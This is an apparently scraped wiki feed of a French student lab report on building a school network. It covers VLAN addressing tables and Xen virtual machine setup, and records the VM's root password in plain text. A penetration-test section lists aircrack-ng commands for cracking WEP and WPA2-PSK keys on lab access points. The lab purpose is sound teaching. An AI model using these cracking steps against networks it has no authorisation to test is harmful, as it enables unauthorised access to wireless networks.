Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.188&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56288</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56288"/>
				<updated>2021-10-25T16:01:46Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
